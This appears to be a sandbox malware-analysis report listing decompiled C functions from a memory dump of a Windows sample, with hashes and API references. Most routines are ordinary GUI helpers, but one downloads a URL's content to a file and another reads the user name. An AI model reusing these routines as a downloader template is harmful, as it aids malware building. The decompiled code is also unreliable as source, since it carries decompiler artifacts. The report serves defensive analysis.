                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$ActiveEnabledIconicNtdllProc_
                                                    • String ID:
                                                    • API String ID: 1720852555-0
                                                    • Opcode ID: 8ef17a5689defe69a59b169c72c27f81d88e002240e7c90d7581b2bd6a1a7dc2
                                                    • Instruction ID: fcf5efa9db48042d746d78bebf6e1cf2cc32c712e84d9ef6b3749e70c2da43cc
                                                    • Opcode Fuzzy Hash: 8ef17a5689defe69a59b169c72c27f81d88e002240e7c90d7581b2bd6a1a7dc2
                                                    • Instruction Fuzzy Hash: EF110071650200EBDB54EE69C9C6B9637E8AF04715F0800AABF04DF2D7D679EC448759
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E0042C6FC(void* __edi, struct HWND__* _a4, signed int _a8) {
                                                    				struct _WINDOWPLACEMENT _v48;
                                                    				void* __ebx;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				signed int _t19;
                                                    				intOrPtr _t21;
                                                    				struct HWND__* _t23;
                                                    
                                                    				_t19 = _a8;
                                                    				_t23 = _a4;
                                                    				if( *0x49e929 != 0) {
                                                    					if((_t19 & 0x00000003) == 0) {
                                                    						if(IsIconic(_t23) == 0) {
                                                    							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
                                                    						} else {
                                                    							GetWindowPlacement(_t23,  &_v48);
                                                    						}
                                                    						return E0042C66C( &(_v48.rcNormalPosition), _t19);
                                                    					}
                                                    					return 0x12340042;
                                                    				}
                                                    				_t21 =  *0x49e904; // 0x42c6fc
                                                    				 *0x49e904 = E0042C4FC(1, _t19, _t21, __edi, _t23);
                                                    				return  *0x49e904(_t23, _t19);
                                                    			}

                                                    0x0042c704
                                                    0x0042c707
                                                    0x0042c711
                                                    0x0042c73b
                                                    0x0042c74c
                                                    0x0042c75f
                                                    0x0042c74e
                                                    0x0042c753
                                                    0x0042c753
                                                    0x00000000
                                                    0x0042c769
                                                    0x00000000
                                                    0x0042c73d
                                                    0x0042c718
                                                    0x0042c725
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID: MonitorFromWindow
                                                    • API String ID: 190572456-2842599566
                                                    • Opcode ID: 8d1f9452d8f12363e96bde9292e11cbfcc82fa1fc2827bfdbdac76f16a64d1e2
                                                    • Instruction ID: a470fbf3681d2cee79b4262df8cd97740cfa3d316a724833ce9ade3e4696291a
                                                    • Opcode Fuzzy Hash: 8d1f9452d8f12363e96bde9292e11cbfcc82fa1fc2827bfdbdac76f16a64d1e2
                                                    • Instruction Fuzzy Hash: 1201ADB1A051296A8B00EB65ADC19BF735C9B84354B900037F810A3241D72CBE019BAE
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 61%
                                                    			E00474D50(void* __eax, void* __ebx, intOrPtr __edx, void* __esi) {
                                                    				intOrPtr _v8;
                                                    				char _v9;
                                                    				void* _v16;
                                                    				void* _v20;
                                                    				char _v24;
                                                    				char _v28;
                                                    				char _v32;
                                                    				char _v36;
                                                    				void _v1060;
                                                    				char _v1392;
                                                    				char _v1856;
                                                    				DWORD* _t57;
                                                    				intOrPtr _t68;
                                                    				void* _t70;
                                                    				void* _t72;
                                                    				void* _t73;
                                                    				intOrPtr _t74;
                                                    
                                                    				_t72 = _t73;
                                                    				_t74 = _t73 + 0xfffff8c4;
                                                    				_v1856 = 0;
                                                    				_v28 = 0;
                                                    				_v32 = 0;
                                                    				_v36 = 0;
                                                    				_v8 = __edx;
                                                    				_t70 = __eax;
                                                    				_t57 =  &_v24;
                                                    				_push(_t72);
                                                    				_push(0x474f77);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t74;
                                                    				E00402B68(0,  &_v1856);
                                                    				L00409E18(_v1856,  &_v28);
                                                    				_v16 = InternetOpenA(E00404E80(_v28), 0, 0, 0, 0);
                                                    				_push(_t72);
                                                    				_push(0x474e92);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t74;
                                                    				_v20 = InternetOpenUrlA(_v16, E00404E80(_t70), 0, 0, 0x84000000, 0);
                                                    				_push(_t72);
                                                    				_push(0x474e74);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t74;
                                                    				E00402F1C( &_v1392, _v8, 0);
                                                    				E004028C4(E004035E4());
                                                    				do {
                                                    					InternetReadFile(_v20,  &_v1060, 0x400, _t57);
                                                    					E004028C4(E0040306C(0));
                                                    				} while ( *_t57 != 0);
                                                    				E004028C4(E0040308C( &_v1392));
                                                    				_v9 = 1;
                                                    				_pop(_t68);
                                                    				 *[fs:eax] = _t68;
                                                    				_push(0x474e7b);
                                                    				return InternetCloseHandle(_v20);
                                                    			}
                                                    0x00474d51
                                                    0x00474d53
                                                    0x00474d5d
                                                    0x00474d63
                                                    0x00474d66
                                                    0x00474d69
                                                    0x00474d6c
                                                    0x00474d6f
                                                    0x00474d71
                                                    0x00474d76
                                                    0x00474d77
                                                    0x00474d7c
                                                    0x00474d7f
                                                    0x00474d8a
                                                    0x00474d98
                                                    0x00474db3
                                                    0x00474db8
                                                    0x00474db9
                                                    0x00474dbe
                                                    0x00474dc1
                                                    0x00474de0
                                                    0x00474de5
                                                    0x00474de6
                                                    0x00474deb
                                                    0x00474dee
                                                    0x00474dfa
                                                    0x00474e0f
                                                    0x00474e14
                                                    0x00474e25
                                                    0x00474e3f
                                                    0x00474e44
                                                    0x00474e54
                                                    0x00474e59
                                                    0x00474e5f
                                                    0x00474e62
                                                    0x00474e65
                                                    0x00474e73

                                                    APIs
                                                      • Part of subcall function 00402B68: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,?,00000000,00474795,004747D4,?,00000000,004747BE,?,?,?,?,00000000), ref: 00402B8C
                                                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00474DAE
                                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000000,00000000), ref: 00474DDB
                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00474E25
                                                    • InternetCloseHandle.WININET(?), ref: 00474E6E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$FileOpen$CloseHandleModuleNameRead
                                                    • String ID:
                                                    • API String ID: 1785656124-0
                                                    • Opcode ID: 258ed6f4a337dd00b29ed6c0571024dd33be25b5071fc36f155e22a10198ec8f
                                                    • Instruction ID: 9dd8df19d1045a063bc6dcad90270211b168fb7c8f28217f7d4554014ce166d6
                                                    • Opcode Fuzzy Hash: 258ed6f4a337dd00b29ed6c0571024dd33be25b5071fc36f155e22a10198ec8f
                                                    • Instruction Fuzzy Hash: 8D318670A00218ABDB11DFA5DC52BAEB7B8EB48704F91447AF504B72C1D7786A00CF68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 85%
                                                    			E0045E9EC(void* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
                                                    				signed int _v8;
                                                    				char _v9;
                                                    				char _v16;
                                                    				char _v20;
                                                    				char _v276;
                                                    				char _v280;
                                                    				intOrPtr _t154;
                                                    				signed int _t160;
                                                    				int _t163;
                                                    				int _t168;
                                                    				signed int _t172;
                                                    				int _t173;
                                                    				int _t183;
                                                    				int _t188;
                                                    				int _t198;
                                                    				int _t202;
                                                    				int _t206;
                                                    				void* _t217;
                                                    				void* _t221;
                                                    				void* _t225;
                                                    				void* _t257;
                                                    				intOrPtr _t278;
                                                    				intOrPtr _t306;
                                                    				struct _ITEMIDLIST** _t307;
                                                    				intOrPtr* _t309;
                                                    				void* _t312;
                                                    				void* _t318;
                                                    				void* _t319;
                                                    				void* _t320;
                                                    
                                                    				_v280 = 0;
                                                    				_v16 = 0;
                                                    				_v20 = 0;
                                                    				_t309 = __edx;
                                                    				_t257 = __eax;
                                                    				_push(_t312);
                                                    				_push(0x45ef62);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t312 + 0xfffffee0;
                                                    				_t306 =  *__edx;
                                                    				if(_t306 !=  *((intOrPtr*)(__eax + 0xd2))) {
                                                    					_push( *(__edx + 8));
                                                    					_push( *(__edx + 4));
                                                    					_push(_t306);
                                                    					_t154 =  *((intOrPtr*)(__eax + 0xda));
                                                    					_push(_t154);
                                                    					L00407540();
                                                    					 *((intOrPtr*)(__edx + 0xc)) = _t154;
                                                    					goto L80;
                                                    				} else {
                                                    					_t160 =  *(__edx + 8);
                                                    					_v8 = _t160 & 0x7fffffff;
                                                    					_v9 = (_t160 & 0x80000000) != 0;
                                                    					_t307 =  *(__edx + 4);
                                                    					if( *_t307 != 0) {
                                                    						__eflags = _v8 - 0x40000;
                                                    						if(_v8 != 0x40000) {
                                                    							_t163 = SHGetPathFromIDList( *_t307,  &_v276);
                                                    							__eflags = _t163;
                                                    							if(_t163 != 0) {
                                                    								E0040A174( &_v276,  &_v16);
                                                    							} else {
                                                    								E004049C0( &_v16);
                                                    							}
                                                    						} else {
                                                    							asm("fild dword [eax]");
                                                    							asm("fldln2");
                                                    							asm("fxch st0, st1");
                                                    							asm("fyl2x");
                                                    							[tword [ebp-0x120] = __fp0;
                                                    							asm("wait");
                                                    							asm("fldln2");
                                                    							asm("fxch st0, st1");
                                                    							asm("fyl2x");
                                                    							asm("fdivrp st1, st0");
                                                    							E00402C20();
                                                    							asm("adc edx, 0x0");
                                                    							E00404BA8();
                                                    							E00404CCC( &_v16, 0x45ef84, _v280);
                                                    						}
                                                    					} else {
                                                    						E004049C0( &_v16);
                                                    					}
                                                    					if(_t307[1] != 0) {
                                                    						_t168 = SHGetPathFromIDList(_t307[1],  &_v276);
                                                    						__eflags = _t168;
                                                    						if(_t168 != 0) {
                                                    							E0040A174( &_v276,  &_v20);
                                                    						} else {
                                                    							E004049C0( &_v20);
                                                    						}
                                                    					} else {
                                                    						E004049C0( &_v20);
                                                    					}
                                                    					_t318 =  *(_t257 + 0xde) - _v8;
                                                    					if(_t318 != 0) {
                                                    						L16:
                                                    						_t172 = _v8;
                                                    						_t319 = _t172 - 0x400;
                                                    						if(_t319 > 0) {
                                                    							__eflags = _t172 - 0x8000;
                                                    							if(__eflags > 0) {
                                                    								_t173 = _t172 - 0x10000;
                                                    								__eflags = _t173;
                                                    								if(_t173 == 0) {
                                                    									__eflags =  *((short*)(_t257 + 0x5c));
                                                    									if( *((short*)(_t257 + 0x5c)) != 0) {
                                                    										 *((intOrPtr*)(_t257 + 0x5a))(_v9);
                                                    									}
                                                    								} else {
                                                    									_t183 = _t173 - 0x10000;
                                                    									__eflags = _t183;
                                                    									if(_t183 == 0) {
                                                    										__eflags =  *((short*)(_t257 + 0x9c));
                                                    										if( *((short*)(_t257 + 0x9c)) != 0) {
                                                    											 *((intOrPtr*)(_t257 + 0x9a))(_v9, _v20);
                                                    										}
                                                    									} else {
                                                    										_t188 = _t183 - 0x20000;
                                                    										__eflags = _t188;
                                                    										if(_t188 == 0) {
                                                    											__eflags =  *((short*)(_t257 + 0x6c));
                                                    											if( *((short*)(_t257 + 0x6c)) != 0) {
                                                    												 *((intOrPtr*)(_t257 + 0x6a))(_v9);
                                                    											}
                                                    										} else {
                                                    											__eflags = _t188 == 0x7fc0000;
                                                    											if(_t188 == 0x7fc0000) {
                                                    												__eflags =  *((short*)(_t257 + 0x34));
                                                    												if( *((short*)(_t257 + 0x34)) != 0) {
                                                    													 *((intOrPtr*)(_t257 + 0x32))();
                                                    												}
                                                    											}
                                                    										}
                                                    									}
                                                    								}
                                                    							} else {
                                                    								if(__eflags == 0) {
                                                    									__eflags =  *((short*)(_t257 + 0xc4));
                                                    									if( *((short*)(_t257 + 0xc4)) != 0) {
                                                    										 *((intOrPtr*)(_t257 + 0xc2))(_v9);
                                                    									}
                                                    								} else {
                                                    									_t198 = _t172 - 0x800;
                                                    									__eflags = _t198;
                                                    									if(_t198 == 0) {
                                                    										__eflags =  *((short*)(_t257 + 0x3c));
                                                    										if( *((short*)(_t257 + 0x3c)) != 0) {
                                                    											 *((intOrPtr*)(_t257 + 0x3a))(_v9);
                                                    										}
                                                    									} else {
                                                    										_t202 = _t198 - 0x800;
                                                    										__eflags = _t202;
                                                    										if(_t202 == 0) {
                                                    											__eflags =  *((short*)(_t257 + 0xbc));
                                                    											if( *((short*)(_t257 + 0xbc)) != 0) {
                                                    												 *((intOrPtr*)(_t257 + 0xba))(_v9);
                                                    											}
                                                    										} else {
                                                    											_t206 = _t202 - 0x1000;
                                                    											__eflags = _t206;
                                                    											if(_t206 == 0) {
                                                    												__eflags =  *((short*)(_t257 + 0xcc));
                                                    												if( *((short*)(_t257 + 0xcc)) != 0) {
                                                    													 *((intOrPtr*)(_t257 + 0xca))(_v9);
                                                    												}
                                                    											} else {
                                                    												__eflags = _t206 == 0x2000;
                                                    												if(_t206 == 0x2000) {
                                                    													__eflags =  *((short*)(_t257 + 0xb4));
                                                    													if( *((short*)(_t257 + 0xb4)) != 0) {
                                                    														 *((intOrPtr*)(_t257 + 0xb2))(_v9);
                                                    													}
                                                    												}
                                                    											}
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    							goto L78;
                                                    						}
                                                    						if(_t319 == 0) {
                                                    							__eflags =  *((short*)(_t257 + 0x94));
                                                    							if( *((short*)(_t257 + 0x94)) != 0) {
                                                    								 *((intOrPtr*)(_t257 + 0x92))(_v9);
                                                    							}
                                                    							goto L78;
                                                    						}
                                                    						_t320 = _t172 - 0x20;
                                                    						if(_t320 > 0) {
                                                    							_t217 = _t172 - 0x40;
                                                    							if(_t217 == 0) {
                                                    								__eflags =  *((short*)(_t257 + 0x7c));
                                                    								if( *((short*)(_t257 + 0x7c)) != 0) {
                                                    									 *((intOrPtr*)(_t257 + 0x7a))(_v9);
                                                    								}
                                                    							} else {
                                                    								_t221 = _t217 - 0x40;
                                                    								if(_t221 == 0) {
                                                    									__eflags =  *((short*)(_t257 + 0x64));
                                                    									if( *((short*)(_t257 + 0x64)) != 0) {
                                                    										 *((intOrPtr*)(_t257 + 0x62))(_v9);
                                                    									}
                                                    								} else {
                                                    									_t225 = _t221 - 0x80;
                                                    									if(_t225 == 0) {
                                                    										__eflags =  *((short*)(_t257 + 0x54));
                                                    										if( *((short*)(_t257 + 0x54)) != 0) {
                                                    											 *((intOrPtr*)(_t257 + 0x52))(_v9);
                                                    										}
                                                    									} else {
                                                    										if(_t225 == 0x100) {
                                                    											__eflags =  *((short*)(_t257 + 0x8c));
                                                    											if( *((short*)(_t257 + 0x8c)) != 0) {
                                                    												 *((intOrPtr*)(_t257 + 0x8a))(_v9);
                                                    											}
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    							goto L78;
                                                    						}
                                                    						if(_t320 == 0) {
                                                    							__eflags =  *((short*)(_t257 + 0x74));
                                                    							if( *((short*)(_t257 + 0x74)) != 0) {
                                                    								 *((intOrPtr*)(_t257 + 0x72))(_v9);
                                                    							}
                                                    							goto L78;
                                                    						}
                                                    						if(_t172 > 0x10) {
                                                    							goto L78;
                                                    						}
                                                    						switch( *((intOrPtr*)(_t172 * 4 +  &M0045EB75))) {
                                                    							case 0:
                                                    								goto L78;
                                                    							case 1:
                                                    								__eflags =  *((short*)(__ebx + 0xa4));
                                                    								if( *((short*)(__ebx + 0xa4)) != 0) {
                                                    									__eax = _v20;
                                                    									_push(__eax);
                                                    									_push(__eax);
                                                    									__ecx = _v16;
                                                    									__edx = __ebx;
                                                    									__eax =  *((intOrPtr*)(__ebx + 0xa6));
                                                    									__eax =  *((intOrPtr*)(__ebx + 0xa2))();
                                                    								}
                                                    								goto L78;
                                                    							case 2:
                                                    								__eflags =  *((short*)(__ebx + 0x44));
                                                    								if( *((short*)(__ebx + 0x44)) != 0) {
                                                    									_push(__eax);
                                                    									__ecx = _v16;
                                                    									__edx = __ebx;
                                                    									__eax =  *((intOrPtr*)(__ebx + 0x46));
                                                    									__eax =  *((intOrPtr*)(__ebx + 0x42))();
                                                    								}
                                                    								goto L78;
                                                    							case 3:
                                                    								__eflags =  *((short*)(__ebx + 0x4c));
                                                    								if( *((short*)(__ebx + 0x4c)) != 0) {
                                                    									_push(__eax);
                                                    									__ecx = _v16;
                                                    									__edx = __ebx;
                                                    									__eax =  *((intOrPtr*)(__ebx + 0x4e));
                                                    									__eax =  *((intOrPtr*)(__ebx + 0x4a))();
                                                    								}
                                                    								goto L78;
                                                    							case 4:
                                                    								__eflags =  *((short*)(__ebx + 0x84));
                                                    								if( *((short*)(__ebx + 0x84)) != 0) {
                                                    									_push(__eax);
                                                    									__ecx = _v16;
                                                    									__edx = __ebx;
                                                    									__eax =  *((intOrPtr*)(__ebx + 0x86));
                                                    									__eax =  *((intOrPtr*)(__ebx + 0x82))();
                                                    								}
                                                    								goto L78;
                                                    							case 5:
                                                    								__eflags =  *((short*)(__ebx + 0xac));
                                                    								if( *((short*)(__ebx + 0xac)) != 0) {
                                                    									_push(__eax);
                                                    									__ecx = _v16;
                                                    									__edx = __ebx;
                                                    									__eax =  *((intOrPtr*)(__ebx + 0xae));
                                                    									__eax =  *((intOrPtr*)(__ebx + 0xaa))();
                                                    								}
                                                    								goto L78;
                                                    						}
                                                    					} else {
                                                    						E00404DCC( *((intOrPtr*)(_t257 + 0xe2)), _v16);
                                                    						if(_t318 != 0) {
                                                    							goto L16;
                                                    						}
                                                    						E00404DCC( *((intOrPtr*)(_t257 + 0xe6)), _v20);
                                                    						if(_t318 == 0) {
                                                    							L78:
                                                    							 *(_t257 + 0xde) = _v8;
                                                    							E00404A14(_t257 + 0xe2, _v16);
                                                    							E00404A14(_t257 + 0xe6, _v20);
                                                    							 *((intOrPtr*)(_t309 + 0xc)) = 0;
                                                    							L80:
                                                    							_pop(_t278);
                                                    							 *[fs:eax] = _t278;
                                                    							_push(0x45ef69);
                                                    							E004049C0( &_v280);
                                                    							return E004049E4( &_v20, 2);
                                                    						}
                                                    						goto L16;
                                                    					}
                                                    				}
                                                    			}

                                                    Instruction address column for the decompiled listing above (separated from the code lines by extraction; addresses range from 0x0045e9fa to 0x0045ef61 within the same function)

                                                    APIs
                                                    • SHGetPathFromIDList.SHELL32(00000000,?), ref: 0045EAF6
                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0045EF62), ref: 0045EF34
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FromListNtdllPathProc_Window
                                                    • String ID:
                                                    • API String ID: 2126419269-0
                                                    • Opcode ID: a1ce6d3f9aa7d91b5e7c472632724b92cfdc2b2c75e54c672ccfa787c41adb86
                                                    • Instruction ID: 2b1d187c4c8c1c8eaadb8a9a71d85ca4ed6e9094f5dd7d40d25eedc3d4306855
                                                    • Opcode Fuzzy Hash: a1ce6d3f9aa7d91b5e7c472632724b92cfdc2b2c75e54c672ccfa787c41adb86
                                                    • Instruction Fuzzy Hash: 59E1B135A001449BDB18DF6AC489AEEB7B5AF08301F5480F6DC65DB397C7789E88CB19
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004289FC(intOrPtr* __eax, void* __ecx, void* __edx) {
                                                    				intOrPtr _v68;
                                                    				intOrPtr _v72;
                                                    				intOrPtr _v76;
                                                    				struct tagENHMETAHEADER _v104;
                                                    				void* __ebp;
                                                    				intOrPtr _t35;
                                                    				intOrPtr* _t37;
                                                    				struct HENHMETAFILE__* _t43;
                                                    				intOrPtr _t44;
                                                    
				_t37 = __eax;
				_t43 = GetClipboardData(0xe); // 0xe == CF_ENHMETAFILE
				if(_t43 == 0) {
					_t35 =  *0x49dbf4; // 0x422ed8
					L00425F28(_t35); // error path: the clipboard holds no enhanced metafile
				}
				E0042819C(_t37);
				_t44 =  *((intOrPtr*)(_t37 + 0x28));
				 *(_t44 + 8) = CopyEnhMetaFileA(_t43, 0); // keep a private copy of the clipboard metafile handle
				GetEnhMetaFileHeader( *(_t44 + 8), 0x64,  &_v104); // 0x64 == 100 bytes of ENHMETAHEADER
				 *((intOrPtr*)(_t44 + 0xc)) = _v72 - _v104.rclFrame; // width  = rclFrame.right - rclFrame.left
				 *((intOrPtr*)(_t44 + 0x10)) = _v68 - _v76; // height = rclFrame.bottom - rclFrame.top
				 *((short*)(_t44 + 0x18)) = 0;
				 *((char*)(_t37 + 0x2c)) = 1;
				 *((char*)(_t37 + 0x22)) =  *((intOrPtr*)( *_t37 + 0x24))() & 0xffffff00 | _t31 != 0x00000000; // _t31 is never declared: decompiler artifact
				return  *((intOrPtr*)( *_t37 + 0x10))();
                                                    			}

                                                    APIs
                                                    • GetClipboardData.USER32 ref: 00428A09
                                                    • CopyEnhMetaFileA.GDI32(00000000,00000000,0000000E), ref: 00428A2B
                                                    • GetEnhMetaFileHeader.GDI32(?,00000064,?,00000000,00000000,0000000E), ref: 00428A3D
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileMeta$ClipboardCopyDataHeader
                                                    • String ID:
                                                    • API String ID: 1752724394-0
                                                    • Opcode ID: 35eb50292ba042bd36530bb86496e29f59b9d8ff315851611da6a03c01692574
                                                    • Instruction ID: 0727d7d259e4847e38e41a473cb046f23bcddc174ccbaa46af5af426c499999d
                                                    • Opcode Fuzzy Hash: 35eb50292ba042bd36530bb86496e29f59b9d8ff315851611da6a03c01692574
                                                    • Instruction Fuzzy Hash: 5D117C71B003008FC710DFAED881A9ABBF8AF05310F10457EE909DB292DA74EC058B99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00458EA4() {
                                                    				struct tagPOINT _v12;
                                                    				void* _t5;
                                                    				long _t6;
                                                    
				 *0x49ebc8 = GetCurrentThreadId(); // remember the id of the polling thread
				L5:
				_t5 =  *0x49ebcc; // 0x0
				_t6 = WaitForSingleObject(_t5, 0x64); // 0x64 == 100 ms timeout
				if(_t6 == 0x102) { // 0x102 == WAIT_TIMEOUT: nothing signalled, poll once and wait again
					if( *0x49ebb8 != 0 &&  *((intOrPtr*)( *0x49ebb8 + 0x60)) != 0) {
						GetCursorPos( &_v12);
						if(E004397F4( &_v12) == 0) {
							E0045B3A8( *0x49ebb8);
						}
					}
					goto L5;
				}
				return _t6; // leaves the loop only when the object at 0x49ebcc is signalled or the wait fails
                                                    			}

                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00458EB0
                                                    • GetCursorPos.USER32(?,00000000,00000064), ref: 00458ECD
                                                    • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00458EED
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentCursorObjectSingleThreadWait
                                                    • String ID:
                                                    • API String ID: 1359611202-0
                                                    • Opcode ID: a10eea83429d5fb08280e8928bc344b6cc34d434c05a26236856c7ecd38cde1d
                                                    • Instruction ID: 5466cc4fe75e799d867a24ddfff030feada42c46f86c6fe88e2ad44c126da2fb
                                                    • Opcode Fuzzy Hash: a10eea83429d5fb08280e8928bc344b6cc34d434c05a26236856c7ecd38cde1d
                                                    • Instruction Fuzzy Hash: 50F054315082049BDB14EB5AD887B5633A8EB14316F50017FE911E62D2DF7EA849C61E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 58%
                                                    			E00472E58(void* __eax, void* __ebx, void* __ecx) {
                                                    				char _v8;
                                                    				long _v12;
                                                    				void* _t26;
                                                    				intOrPtr _t35;
                                                    				void* _t39;
                                                    
				_v8 = 0;
				_t26 = __eax;
				_push(_t39);
				_push(0x472ed2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t39 + 0xfffffff8; // SEH frame registration (compiler-generated try/finally)
				_v12 = 0xff; // 255-byte buffer for the account name
				E0040500C( &_v8, _v12);
				if(GetUserNameA(E00404E80(_v8),  &_v12) == 0) {
					E00404A14(_t26, "Unknown"); // lookup failed: the result is the literal "Unknown"
				} else {
					E00404EE0(_v8, _v12 - 1, 1, _t26); // _v12 now holds the length including the terminating NUL, hence - 1
				}
				_pop(_t35);
				 *[fs:eax] = _t35; // unlink the SEH frame
				_push(0x472ed9);
				return E004049C0( &_v8);
                                                    			}

                                                    APIs
                                                    • GetUserNameA.ADVAPI32(00000000,000000FF), ref: 00472E93
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID: Unknown
                                                    • API String ID: 2645101109-1654365787
                                                    • Opcode ID: 5b6e7aaaec9e298c770fb3111eeb0c4b82573b49f98721f3986b5109218376cd
                                                    • Instruction ID: 0e574cec38e77eee5c3ac86c404587bc9d0c2a183e22f9869122a41002a7b21b
                                                    • Opcode Fuzzy Hash: 5b6e7aaaec9e298c770fb3111eeb0c4b82573b49f98721f3986b5109218376cd
                                                    • Instruction Fuzzy Hash: C2016770A04508ABDB00DBA6DD4199EB7E9EB88304F61817AA504E3691D778AE01955D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0044083C(intOrPtr* __eax, intOrPtr __edx) {
                                                    				intOrPtr _v8;
                                                    				void* __ecx;
                                                    				void* _t25;
                                                    				intOrPtr* _t31;
                                                    				void* _t34;
                                                    				intOrPtr* _t37;
                                                    				void* _t45;
                                                    
				_v8 = __edx; // pointer to the WM_SYSCOMMAND message record: +4 wParam (command), +8 key character
				_t37 = __eax;
				if(( *(_v8 + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(_v8 + 8)) == 0x20 ||  *((short*)(_v8 + 8)) == 0x2d || IsIconic( *(__eax + 0x180)) != 0 || GetCapture() != 0) { // 0xf100 == SC_KEYMENU (low four bits of wParam are reserved, hence the mask); 0x20 == ' ', 0x2d == '-'
					L8:
					if(( *(_v8 + 4) & 0x0000fff0) != 0xf100) { // not a keyboard menu command: hand it to the inherited handler
						L10:
						return  *((intOrPtr*)( *_t37 - 0x10))();
					}
					_t25 = E0044078C(_t37, _t45);
					if(_t25 == 0) {
						goto L10;
					}
				} else {
					_t31 =  *0x49dbcc; // 0x49ebb8
					if(_t37 ==  *((intOrPtr*)( *_t31 + 0x44))) {
                                                    						goto L8;
                                                    					} else {
                                                    						_t34 = L004519E0(_t37);
                                                    						_t44 = _t34;
                                                    						if(_t34 == 0) {
                                                    							goto L8;
                                                    						} else {
                                                    							_t25 = E0043C130(_t44, 0, 0xb017, _v8);
                                                    							if(_t25 == 0) {
                                                    								goto L8;
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t25;
                                                    			}

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CaptureIconic
                                                    • String ID:
                                                    • API String ID: 2277910766-0
                                                    • Opcode ID: 850b444ef3a58a1a1115db53f267b44a64354c32b35f7766e8262930511a7e18
                                                    • Instruction ID: 1854ad3725da6f9c39b561de1c6dc083fd0ae92529cbbd4a26d730481ff8a107
                                                    • Opcode Fuzzy Hash: 850b444ef3a58a1a1115db53f267b44a64354c32b35f7766e8262930511a7e18
                                                    • Instruction Fuzzy Hash: C2114231B00205DBFB24FF59C685AAAB3F4AF04304B24407AF504EB352DB38ED549B98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 46%
                                                    			E0040E088(int __eax, void* __ebx, void* __eflags) {
                                                    				char _v11;
                                                    				char _v16;
                                                    				intOrPtr _t28;
                                                    				void* _t31;
                                                    				void* _t33;
                                                    
                                                    				_t33 = __eflags;
                                                    				_v16 = 0;
                                                    				_push(_t31);
                                                    				_push(0x40e0ec);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7); // 0x1004 == LOCALE_IDEFAULTANSICODEPAGE: code page as a decimal string into a 7-byte buffer
